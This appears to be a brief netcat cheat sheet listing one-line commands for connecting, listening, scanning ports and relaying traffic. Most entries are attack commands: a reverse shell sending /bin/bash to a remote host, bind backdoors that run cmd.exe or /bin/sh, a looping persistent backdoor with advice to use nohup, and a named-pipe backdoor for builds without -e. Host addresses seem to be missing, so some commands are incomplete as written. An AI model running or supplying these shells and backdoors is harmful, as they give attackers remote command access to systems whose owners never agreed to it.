Netcat rocks my socks


Connect to a socket on host on TCP port 81

nc 81

Listen on the local machine for inbound TCP connections on port 81

nc -nvlp 81

Reverse shell sent to host over TCP port 53

nc 53 -e /bin/bash

Backdoor listening on TCP 80 set to execute cmd.exe when connected

nc -nvlp 80 -e cmd.exe

More Fancy

Attempt to connect to each port from 10-90 on, don't resolve any names -n, don't send any data -z, and only wait 1 second for a connection -w1

nc -nvzw1 10-90

Netcat stops listening after the connection drops or is terminated, which can make getting another shell back annoying. Placing nc in a bash true loop is an easy way to work around this, use nohup also!

while [ 1 ]; do echo β€œstarted”; nc -l -p 1234 -e /bin/sh; done

Netcat relay used to forward everything received by the host on TCP 4321 sent to on TCP 8123

nc -l -p 4321 | nc 8123

Create a netcat backdoor without -e support. This generates a named pipe which is used to funnel data between bash and nc.

mknod backpipe p
/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe